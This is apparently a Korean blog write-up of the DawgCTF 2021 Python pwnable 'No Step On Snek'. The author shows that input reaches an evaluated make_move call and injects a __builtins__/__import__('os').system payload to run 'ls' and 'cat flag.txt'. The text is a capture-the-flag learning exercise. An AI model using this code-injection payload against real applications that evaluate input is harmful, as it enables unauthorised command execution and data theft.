
[DawgCTF 2021] :pwn: No Step On Snek Write-Up
두비니
·2021. 5. 14. 08:53
No Step On Snek - 75pts
Description
Tag
pwnable, python, RCE
Problem Analysis
접속을 하면 이런 창이 나타나는데, 설명에 쓰여져있는 키를 눌러도 아무것도 실행이 되지 않습니다. 그래서 이상한 값을 집어넣는 경우에는 이런게 발생합니다.
보아하니, make_move(maze)라는 명령어가 실행이 되고, 이때 maze라는 것은 저희의 입력인 것을 알 수 있네요. 이 점을 이용해서 code injection을 실행시켜주면 좋지 않을까 생각합니다.
Exploit
그래서 확인을 우선 해 봅시다!
__builtins__.__dict__['__import__']("os").system("ls")
잘 실행이 되네요. 그래서 바로 flag.txt를 열어보면
__builtins__.__dict__['__import__']("os").system("cat flag.txt")
오...신기신기
pyjail 유형 문제들은 풀어봤는데 이렇게 그냥 아무데나 집어넣어도 이렇게 실행이 잘 되는줄 몰랐습니다ㅎㅎ 재미있었어요!
혹시나 이해가 안된다면 이 글을 보시고 오는걸 추천합니다:
https://dokhakdubini.tistory.com/471
[Python] Built-in 객체 사용하기, 응용하기 (Python RCE)
Built-in 객체 사용하기, 응용하기 (for CTF) Python built-in functions (Python RCE) 요즘 python으로 포너블 문제가 많이 나오던데, 왠만하면 이거 관련 문제들이여서 한번 정리하려고 합니당 1. __builtin__..
dokhakdubini.tistory.com
끝!
'CTF' 카테고리의 다른 글
[DawgCTF 2021] :pwn: MDL Considered Harmful Write-Up (0) | 2021.05.15 |
---|---|
[DawgCTF 2021] :pwn: Bofit Write-Up (0) | 2021.05.14 |
[DawgCTF 2021] Write-Up :Misc: (0) | 2021.05.11 |
[CodeFest 2021] :pwn: Write-Up (0) | 2021.03.20 |
[PoseidonCTF 2020] misc write-up (0) | 2020.08.10 |